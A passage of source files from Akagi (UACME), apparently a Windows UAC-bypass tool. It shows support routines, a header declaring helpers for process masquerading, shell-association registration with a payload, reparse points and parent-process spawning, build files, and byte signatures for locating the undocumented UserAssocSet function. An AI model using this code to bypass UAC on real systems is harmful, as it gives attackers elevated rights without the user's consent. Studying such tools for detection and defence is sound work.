*
*/
BOOLEAN supReplaceVersionInfo(
_In_ LPCWSTR lpFileName,
_In_ PBYTE lpResource,
_In_ DWORD dwResourceSize,
_In_ DWORD dwKey
)
{
BOOLEAN bResult = TRUE;
HANDLE hUpdate;
PVOID pvBuffer;
SIZE_T bufferSize = ALIGN_UP_BY(dwResourceSize, PAGE_SIZE);
do {
pvBuffer = supVirtualAlloc(&bufferSize, DEFAULT_ALLOCATION_TYPE | MEM_TOP_DOWN, DEFAULT_PROTECT_TYPE, NULL);
if (pvBuffer == NULL) {
bResult = FALSE;
break;
}
RtlCopyMemory(pvBuffer, lpResource, dwResourceSize);
EncodeBuffer(pvBuffer, dwResourceSize, dwKey);
hUpdate = BeginUpdateResource(lpFileName, FALSE);
if (hUpdate == NULL) {
bResult = FALSE;
break;
}
if (!UpdateResource(hUpdate, RT_VERSION, MAKEINTRESOURCEW(1),
MAKELANGID(LANG_ENGLISH, SUBLANG_ENGLISH_US),
pvBuffer, dwResourceSize))
{
EndUpdateResource(hUpdate, TRUE);
break;
}
EndUpdateResource(hUpdate, FALSE);
} while (FALSE);
if (pvBuffer)
supSecureVirtualFree(pvBuffer, bufferSize, NULL);
return bResult;
}
================================================
FILE: Source/Akagi/sup.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2025
*
* TITLE: SUP.H
*
* VERSION: 3.68
*
* DATE: 07 Mar 2025
*
* Common header file for the program support routines.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef int(__cdecl* pswprintf_s)(
wchar_t* buffer,
size_t sizeOfBuffer,
const wchar_t* format,
...);
#define TEXT_SECTION ".text"
#define TEXT_SECTION_LEGNTH sizeof(TEXT_SECTION)
//
// Shell association start.
//
typedef enum {
UASET_CLEAR = 0,
UASET_APPLICATION,
UASET_PROGID,
} UASET;
typedef HRESULT(WINAPI* pfnUserAssocSet)(
UASET set,
LPCWSTR pszExt,
LPCWSTR pszSet);
typedef HRESULT(WINAPI* pfnUserAssocSet2)(
UASET set,
LPCWSTR pszExt,
LPCWSTR pszSet,
ULONG dwFlags);
typedef struct _USER_ASSOC_PTR {
union {
pfnUserAssocSet UserAssocSet;
pfnUserAssocSet2 UserAssocSet2; //Win10 1904 1909
} DUMMYUNIONNAME;
BOOL Valid;
} USER_ASSOC_PTR, * PUSER_ASSOC_PTR;
typedef struct USER_ASSOC_PATTERN {
PVOID Ptr;
DWORD Size;
} USER_ASSOC_PATTERN, * PUSER_ASSOC_PATTERN;
typedef struct USER_ASSOC_SIGNATURE {
ULONG NtBuildMin;
ULONG NtBuildMax;
ULONG PatternsCount;
PVOID PatternsTable;
} USER_ASSOC_SIGNATURE, * PUSER_ASSOC_SIGNATURE;
typedef VOID(WINAPI* PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)(
_In_ PUSER_ASSOC_SIGNATURE Signature,
_In_opt_ PVOID Context,
_Inout_ BOOLEAN* StopEnumeration
);
//
// Shell association end.
//
typedef struct _SXS_SEARCH_CONTEXT {
LPWSTR DllName;
LPWSTR SxsKey;
LPWSTR FullDllPath;
} SXS_SEARCH_CONTEXT, *PSXS_SEARCH_CONTEXT;
//ntifs.h
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, *PREPARSE_DATA_BUFFER;
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
//
// Memory allocator flags.
//
#define DEFAULT_ALLOCATION_TYPE MEM_COMMIT | MEM_RESERVE
#define DEFAULT_PROTECT_TYPE PAGE_READWRITE
//
// sup* prototypes
//
VOID supSetLastErrorFromNtStatus(
_In_ NTSTATUS LastNtStatus);
BOOLEAN supIsProcess32bit(
_In_ HANDLE hProcess);
BOOL supGetElevationType(
_Out_ TOKEN_ELEVATION_TYPE *lpType);
BOOL supWriteBufferToFile(
_In_ LPCWSTR lpFileName,
_In_opt_ PVOID Buffer,
_In_ DWORD BufferSize);
BOOL supDecodeAndWriteBufferToFile(
_In_ LPWSTR lpFileName,
_In_ CONST PVOID Buffer,
_In_ DWORD BufferSize,
_In_ ULONG Key);
PBYTE supReadFileToBuffer(
_In_ LPCWSTR lpFileName,
_Inout_opt_ LPDWORD lpBufferSize);
HANDLE supRunProcess3(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpVerb,
_In_ INT nShow);
BOOL supRunProcess2(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters,
_In_opt_ LPCWSTR lpVerb,
_In_ INT nShow,
_In_ ULONG mTimeOut);
BOOL supRunProcess(
_In_ LPCWSTR lpFile,
_In_opt_ LPCWSTR lpParameters);
void supCopyMemory(
_Inout_ void *dest,
_In_ size_t cbdest,
_In_ const void *src,
_In_ size_t cbsrc);
LPWSTR supQueryEnvironmentVariableOffset(
_In_ PUNICODE_STRING Value);
DWORD supCalculateCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength);
BOOLEAN supVerifyMappedImageMatchesChecksum(
_In_ PVOID BaseAddress,
_In_ ULONG FileLength);
BOOLEAN supSetCheckSumForMappedFile(
_In_ PVOID BaseAddress,
_In_ ULONG CheckSum);
NTSTATUS supLdrQueryResourceDataEx(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_Out_ PULONG DataSize,
_Out_ PVOID* Data);
PBYTE supLdrQueryResourceData(
_In_ ULONG_PTR ResourceId,
_In_ PVOID DllHandle,
_Out_ PULONG DataSize);
VOID supMasqueradeProcess(
_In_ BOOL Restore);
DWORD supExpandEnvironmentStrings(
_In_ LPCWSTR lpSrc,
_In_ LPWSTR lpDst,
_In_ DWORD nSize);
BOOL sxsFindLoaderEntry(
_In_ PSXS_SEARCH_CONTEXT Context);
VOID supDebugPrint(
_In_ LPCWSTR ApiName,
_In_ DWORD status);
PVOID supVirtualAlloc(
_Inout_ PSIZE_T Size,
_In_ ULONG AllocationType,
_In_ ULONG Protect,
_Out_opt_ NTSTATUS *Status);
BOOL supVirtualFree(
_In_ PVOID Memory,
_Out_opt_ NTSTATUS *Status);
BOOL supSecureVirtualFree(
_In_ PVOID Memory,
_In_ SIZE_T MemorySize,
_Out_opt_ NTSTATUS *Status);
PVOID FORCEINLINE supHeapAlloc(
_In_ SIZE_T Size);
BOOL FORCEINLINE supHeapFree(
_In_ PVOID Memory);
BOOL supRegDeleteKeyRecursive(
_In_ HKEY hKeyRoot,
_In_ LPCWSTR lpSubKey);
BOOL supSetEnvVariableEx(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData);
BOOL supSetEnvVariable(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData);
BOOL supSetEnvVariable2(
_In_ BOOL fRemove,
_In_opt_ LPWSTR lpKeyName,
_In_ LPCWSTR lpVariableName,
_In_opt_ LPCWSTR lpVariableData);
_Success_(return)
BOOL supReplaceEnvironmentVariableValue(
_In_opt_ LPWSTR lpKeyName,
_In_ LPWSTR lpVariableName,
_In_ DWORD dwType,
_In_opt_ LPWSTR lpVariableData,
_Out_opt_ PVOID* lpOldVariableData);
BOOL supSetMountPoint(
_In_ HANDLE hDirectory,
_In_ LPCWSTR lpTarget,
_In_ LPCWSTR lpPrintName);
BOOL supDeleteMountPoint(
_In_ HANDLE hDirectory);
HANDLE supOpenDirectoryForReparse(
_In_ LPCWSTR lpDirectory);
BOOL supWinstationToName(
_In_opt_ HWINSTA hWinsta,
_In_ LPWSTR lpBuffer,
_In_ DWORD cbBuffer,
_Out_ PDWORD BytesNeeded);
BOOL supDesktopToName(
_In_opt_ HDESK hDesktop,
_In_ LPWSTR lpBuffer,
_In_ DWORD cbBuffer,
_Out_ PDWORD BytesNeeded);
BOOL supReplaceDllEntryPoint(
_In_ PVOID DllImage,
_In_ ULONG SizeOfDllImage,
_In_ LPCSTR lpEntryPointName,
_In_ BOOL fConvertToExe);
NTSTATUS supRegWriteValue(
_In_ HANDLE hKey,
_In_opt_ LPWSTR ValueName,
_In_ DWORD ValueType,
_In_ PVOID ValueData,
_In_ ULONG ValueDataSize);
NTSTATUS supRegReadValue(
_In_ HANDLE hKey,
_In_ LPWSTR ValueName,
_In_ DWORD ValueType,
_Out_ PVOID *Buffer,
_Out_ ULONG *BufferSize,
_In_opt_ HANDLE hHeap);
NTSTATUS supRegCurrentUserDeleteSubKeyValue(
_In_ LPWSTR SubKey,
_In_ LPWSTR ValueName);
BOOL supQuerySystemRoot(
_Inout_ PVOID Context);
PVOID supGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);
BOOL supIsCorImageFile(
_In_ PVOID ImageBase);
PVOID supEncodePointer(
_In_ PVOID Pointer);
PVOID supDecodePointer(
_In_ PVOID Pointer);
NTSTATUS supCreateDirectory(
_Out_opt_ PHANDLE phDirectory,
_In_ OBJECT_ATTRIBUTES *ObjectAttributes,
_In_ ULONG DirectoryShareFlags,
_In_ ULONG DirectoryAttributes);
BOOL supCreateSharedParametersBlock(
_In_ PVOID ucmContext);
VOID supDestroySharedParametersBlock(
_In_ PVOID ucmContext);
PVOID supCreateUacmeContext(
_In_ ULONG Method,
_In_reads_or_z_opt_(OptionalParameterLength) LPWSTR OptionalParameter,
_In_ ULONG OptionalParameterLength,
_In_ PVOID DecompressRoutine);
VOID supDestroyUacmeContext(
_In_ PVOID Context);
NTSTATUS supEnableDisableWow64Redirection(
_In_ BOOL bDisable);
NTSTATUS supGetProcessDebugObject(
_In_ HANDLE ProcessHandle,
_Out_ PHANDLE DebugObjectHandle);
BOOL supIsProcessRunning(
_In_ LPWSTR ProcessName);
void supBinTextEncode(
_In_ unsigned __int64 x,
_Inout_ wchar_t* s);
VOID supGenerateSharedObjectName(
_In_ WORD ObjectId,
_Inout_ LPWSTR lpBuffer);
VOID supSetGlobalCompletionEvent(
VOID);
NTSTATUS supWaitForGlobalCompletionEvent(
VOID);
NTSTATUS supOpenClassesKey(
_In_opt_ PUNICODE_STRING UserRegEntry,
_Out_ PHANDLE KeyHandle);
NTSTATUS supRemoveRegLinkHKCU(
_In_ LPWSTR lpszRegLink);
PVOID supFindPattern(
_In_ CONST PBYTE Buffer,
_In_ SIZE_T BufferSize,
_In_ CONST PBYTE Pattern,
_In_ SIZE_T PatternSize);
PVOID supLookupImageSectionByName(
_In_ CHAR* SectionName,
_In_ ULONG SectionNameLength,
_In_ PVOID DllBase,
_Out_ PULONG SectionSize);
NTSTATUS supFindUserAssocSet(
_Out_ USER_ASSOC_PTR* Function);
PUSER_ASSOC_SIGNATURE supGetUserAssocSetDB(
_Out_opt_ PULONG SignatureCount);
VOID supEnumUserAssocSetDB(
_In_ PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION Callback,
_In_opt_ PVOID Context);
NTSTATUS supRegisterShellAssoc(
_In_ LPCWSTR pszExt,
_In_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc,
_In_ LPCWSTR lpszPayload,
_In_ BOOL fCustomURIScheme,
_In_opt_ LPCWSTR pszDefaultValue);
NTSTATUS supUnregisterShellAssocEx(
_In_ BOOLEAN fResetOnly,
_In_ LPCWSTR pszExt,
_In_opt_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc);
NTSTATUS supUnregisterShellAssoc(
_In_ LPCWSTR pszExt,
_In_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc);
NTSTATUS supResetShellAssoc(
_In_ LPCWSTR pszExt,
_In_opt_ LPCWSTR pszProgId,
_In_ USER_ASSOC_PTR* UserAssocFunc);
BOOL supStopTaskByName(
_In_ LPCWSTR TaskFolder,
_In_ LPCWSTR TaskName);
LPWSTR supPathAddBackSlash(
_In_ LPWSTR lpszPath);
HANDLE supOpenShellProcess(
_In_ ULONG dwDesiredAccess);
HANDLE supRunProcessFromParent(
_In_ HANDLE hParentProcess,
_Inout_opt_ LPWSTR lpApplicationName,
_In_ LPWSTR lpszParameters,
_In_opt_ LPWSTR lpCurrentDirectory,
_In_ ULONG CreationFlags,
_In_ WORD ShowWindowFlags,
_Out_opt_ HANDLE* PrimaryThread);
RPC_STATUS supCreateBindingHandle(
_In_ RPC_WSTR RpcInterfaceUuid,
_Out_ RPC_BINDING_HANDLE* BindingHandle);
BOOL supConcatenatePaths(
_Inout_ LPWSTR Target,
_In_ LPCWSTR Path,
_In_ SIZE_T TargetBufferSize);
typedef BOOL(CALLBACK* pfnEnumProcessCallback)(
_In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
_In_opt_ PVOID UserContext
);
BOOL supEnumProcessesForSession(
_In_ ULONG SessionId,
_In_ pfnEnumProcessCallback Callback,
_In_opt_ PVOID UserContext);
BOOL supRemoveDirectoryRecursive(
_In_ LPCWSTR Path);
VOID supEnableToastForProtocol(
_In_ LPCWSTR lpProtocol,
_In_ BOOL fEnable);
ULONG supWaitForChildProcesses(
_In_ LPCWSTR lpProcessName,
_In_ DWORD dwWaitMiliseconds);
VOID supRaiseHardError(
_In_ NTSTATUS HardErrorStatus);
BOOL supGetThreadTokenImpersonationLevel(
_In_ HANDLE ThreadHandle,
_Out_ PSECURITY_IMPERSONATION_LEVEL ImpersonationLevel);
ULONGLONG supGetTickCount64(
VOID);
BOOL CALLBACK supEnumTaskhostTasksCallback(
_In_ PSYSTEM_PROCESS_INFORMATION ProcessEntry,
_In_ PVOID UserContext);
BOOLEAN supStartScheduledTask(
_In_ LPCWSTR lpTaskFolder,
_In_ LPCWSTR lpTaskName);
BOOLEAN supReplaceVersionInfo(
_In_ LPCWSTR lpFileName,
_In_ PBYTE lpResource,
_In_ DWORD dwResourceSize,
_In_ DWORD dwKey);
#ifdef _DEBUG
#define supDbgMsg(Message) OutputDebugString(Message)
#else
#define supDbgMsg(Message)
#endif
#define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1)
================================================
FILE: Source/Akagi/tests/test.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2022
*
* TITLE: TEST.C
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
VOID WINAPI TestEnumDB(
_In_ PUSER_ASSOC_SIGNATURE Signature,
_In_opt_ PVOID Context,
_Inout_ BOOLEAN* StopEnumeration
)
{
WCHAR szBuffer[MAX_PATH + 1];
UNREFERENCED_PARAMETER(Context);
_strcpy(szBuffer, TEXT("\r\nSign->NtBuildMin: "));
ultostr(Signature->NtBuildMin, _strend(szBuffer));
_strcat(szBuffer, TEXT("\r\n"));
_strcat(szBuffer, TEXT("Sign->NtBuildMax: "));
ultostr(Signature->NtBuildMax, _strend(szBuffer));
_strcat(szBuffer, TEXT("\r\n"));
_strcat(szBuffer, TEXT("Sign->PatternsCount: "));
ultostr(Signature->PatternsCount, _strend(szBuffer));
_strcat(szBuffer, TEXT("\r\n"));
_strcat(szBuffer, TEXT("Sign->PatternsTable: 0x"));
u64tohex((ULONG_PTR)Signature->PatternsTable, _strend(szBuffer));
_strcat(szBuffer, TEXT("\r\n------------------"));
OutputDebugString(szBuffer);
*StopEnumeration = FALSE;
}
VOID TestEnumUAS()
{
supEnumUserAssocSetDB((PSUP_UAS_ENUMERATION_CALLBACK_FUNCTION)TestEnumDB, NULL);
}
/*
* ucmTestRoutine
*
* Purpose:
*
* Test routine, can serve multiple purposes.
*
*/
BOOL ucmTestRoutine(
_In_opt_ PVOID PayloadCode,
_In_ ULONG PayloadSize)
{
UNREFERENCED_PARAMETER(PayloadCode);
UNREFERENCED_PARAMETER(PayloadSize);
//TestEnumUAS();
supSetGlobalCompletionEvent();
return TRUE;
}
================================================
FILE: Source/Akagi/tests/test.h
================================================
#/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2022
*
* TITLE: TEST.H
*
* VERSION: 3.61
*
* DATE: 22 Jun 2022
*
* Test unit header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef interface ITestInterface ITestInterface;
typedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(
__RPC__in ITestInterface * This);
typedef struct ITestInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ITestInterface * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ITestInterface * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ITestInterface * This);
MethodPfn a[200];
/* HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method12)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method13)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method14)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method15)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ITestInterface * This);*/
END_INTERFACE
} *PITestInterfaceVtbl;
interface ITestInterface
{
CONST_VTBL struct ITestInterfaceVtbl *lpVtbl;
};
BOOL ucmTestRoutine(
_In_opt_ PVOID PayloadCode,
_In_ ULONG PayloadSize);
================================================
FILE: Source/Akagi/uacme.vcxproj
================================================
DebugConsole
Win32
DebugConsole
x64
Debug
Win32
Debug
x64
ReleaseInternalConsole
Win32
ReleaseInternalConsole
x64
ReleaseInternal
Win32
ReleaseInternal
x64
Release
Win32
Release
x64
{210A3DB2-11E3-4BB4-BE7D-554935DCCA43}
Win32Proj
uacme
Akagi
10.0
Application
true
v145
Unicode
Application
true
v145
Unicode
true
v145
Unicode
false
true
v145
Unicode
false
false
v145
true
Unicode
Application
false
v145
true
Unicode
Application
false
v145
true
Unicode
false
v145
true
Unicode
false
false
v145
true
Unicode
false
false
v145
true
Unicode
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
AllRules.ruleset
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
AllRules.ruleset
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
AllRules.ruleset
false
true
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
AllRules.ruleset
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
NativeRecommendedRules.ruleset
$(ProjectName)32
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
NativeRecommendedRules.ruleset
$(ProjectName)32
true
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
NativeRecommendedRules.ruleset
$(ProjectName)32Con
true
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
AllRules.ruleset
false
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64
AllRules.ruleset
true
true
false
.\output\$(Platform)\$(Configuration)\
.\output\$(Platform)\$(Configuration)\
$(ProjectName)64Con
AllRules.ruleset
true
true
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
$(ProjectDir);$(SolutionDir)
true
Windows
true
6.1
6.1
true
useRc32;%(PreprocessorDefinitions)
akagi.manifest
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)
true
false
$(ProjectDir);$(SolutionDir)
true
Windows
true
6.1
6.1
true
useRc32;%(PreprocessorDefinitions)
akagi.manifest
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;%(PreprocessorDefinitions)
true
false
$(ProjectDir);$(SolutionDir)
true
Windows
true
6.1
6.1
true
akagi.manifest
Level4
Disabled
WIN32;_DEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)
true
false
$(ProjectDir);$(SolutionDir)
true
Windows
true
6.1
6.1
true
akagi.manifest
Level4
MaxSpeed
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
false
None
true
true
$(ProjectDir);$(SolutionDir)
false
Windows
No
true
true
true
6.1
6.1
true
useRc32;%(PreprocessorDefinitions)
akagi.manifest
Level4
MaxSpeed
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
true
None
true
true
$(ProjectDir);$(SolutionDir)
StdCall
false
Windows
No
true
true
true
6.1
6.1
true
useRc32;%(PreprocessorDefinitions)
akagi.manifest
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe
Level4
MaxSpeed
true
WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
true
None
true
true
$(ProjectDir);$(SolutionDir)
StdCall
false
Windows
No
true
true
true
6.1
6.1
true
useRc32;%(PreprocessorDefinitions)
akagi.manifest
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi32.exe
Level4
MinSpace
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
false
true
true
$(ProjectDir);$(SolutionDir)
false
Windows
false
true
true
true
6.1
6.1
true
akagi.manifest
Level4
MinSpace
true
WIN32;NDEBUG;_WINDOWS;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
true
true
true
$(ProjectDir);$(SolutionDir)
false
Windows
true
true
true
6.1
6.1
false
true
akagi.manifest
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe
Level4
MinSpace
true
WIN32;NDEBUG;_WINDOWS;_UCM_CONSOLE;%(PreprocessorDefinitions)
Size
false
MultiThreaded
CompileAsC
true
true
true
true
$(ProjectDir);$(SolutionDir)
false
Windows
true
true
true
6.1
6.1
false
true
akagi.manifest
\Utils\StripDebug.exe .\output\$(Platform)\$(Configuration)\Akagi64.exe
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
true
================================================
FILE: Source/Akagi/uacme.vcxproj.filters
================================================
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
{1caf2f34-af91-46be-aa2e-1893b0be628c}
{c4fc1dcf-e216-4458-a377-e7203d627128}
{6a18d07e-0b0d-455a-b4c2-1379f5934479}
{751f7002-5a6c-4d2e-9296-3b8132e640f8}
{b3b23f8d-a79f-4195-85a2-ce0665938c27}
{1df8392c-a609-47c6-b987-44e7268833eb}
{bf8226e8-2fd3-40d0-be5f-d04777becad3}
{b9dae49c-a48a-4bca-9c20-5ee013126ee8}
{3b1593e5-eb08-4b0d-a8a4-362b39344711}
Source Files
Source Files
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
minirtl
Source Files
minirtl
Source Files
minirtl
minirtl
minirtl
minirtl
testunits
Source Files\methods
Source Files\methods
ldr
Source Files\methods
Source Files\methods
Source Files
Source Files\methods
minirtl
Source Files\methods
minirtl
Source Files\methods
Source Files\methods
Source Files\methods
appinfo
appinfo
Source Files
Source Files
Source Files\methods
hde
Source Files\methods
pcasvc\w8_10
pcasvc\w8_10
pcasvc\w7
pcasvc\w7
Source Files
Source Files\methods
Source Files
Source Files\methods
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
Header Files
minirtl
testunits
ldr
Header Files
Header Files
Source Files\methods
Source Files\methods
Source Files\methods
Header Files
Header Files
Header Files
hde
hde
hde
Header Files
Header Files
Source Files\methods
Header Files
Resource Files
Resource Files
Resource Files
Resource Files
Header Files
================================================
FILE: Source/Akagi/uacme.vcxproj.user
================================================
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
78
WindowsLocalDebugger
WindowsLocalDebugger
WindowsLocalDebugger
71
WindowsLocalDebugger
71
WindowsLocalDebugger
0
WindowsLocalDebugger
78|0|
78
WindowsLocalDebugger
================================================
FILE: Source/Akagi/uas.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2021 - 2024
*
* TITLE: UAS.H
*
* VERSION: 3.66
*
* DATE: 22 Jul 2024
*
* UserAssocSet signature file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//
// UserAssocSet patterns.
//
// mov r8, [rbx + 40h]
// mov rdx, [rbx + 38h]
// mov ecx, 1
// call UserAssocSet
static BYTE UserAssocSet_7601[] = {
0x4C, 0x8B, 0x43, 0x40, 0x48, 0x8B, 0x53, 0x38, 0xB9, 0x01, 0x00, 0x00, 0x00
};
// mov r8, rsi
// mov rdx, rbx
// mov ecx, 2
// call UserAssocSet
static BYTE UserAssocSet_9600[] = {
0x4C, 0x8B, 0xC6, 0x48, 0x8B, 0xD3, 0xB9, 0x02, 0x00, 0x00, 0x00
};
// imul rax, 4Eh
// mov ecx, 2
// add r8, rax
// call UserAssocSet
static BYTE UserAssocSet_14393[] = {
0x48, 0x6B, 0xC0, 0x4E, 0xB9, 0x02, 0x00, 0x00, 0x00, 0x4C, 0x03, 0xC0
};
// mov r8, rsi
// mov r9d, ecx
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_17763_v1554[] = {
0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7
};
// mov ecx, r9d
// mov r8, rdi
// mov rdx, rsi
// call UserAssocSet
static BYTE UserAssocSet_17763_v1728[] = {
0x41, 0x8B, 0xC9, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD6
};
// mov ecx, eax
// mov r8, rdi
// mov rdx, rbp
// call UserAssocSet
static BYTE UserAssocSet_17763_v1971[] = {
0x44, 0x8B, 0xC8, 0x8B, 0xC8, 0x4C, 0x8B, 0xC7, 0x48, 0x8B, 0xD5
};
// mov r9d, ecx
// mov r8, rsi
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_18362[] = {
0x44, 0x8B, 0xC9, 0x4C, 0x8B, 0xC6, 0x49, 0x8B, 0xD7
};
static BYTE UserAssocSet_18362_v2[] = {
0x4C, 0x8B, 0xC7, 0x41, 0x8B, 0xC9, 0x48, 0x8B, 0xD6
};
// mov r8, rsi
// mov r9d, ecx
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_18363[] = {
0x4C, 0x8B, 0xC6, 0x44, 0x8B, 0xC9, 0x49, 0x8B, 0xD7
};
// mov r9d, ecx
// mov r8, rsi
// mov rdx, r15
// call UserAssocSet
static BYTE UserAssocSet_19041[] = {
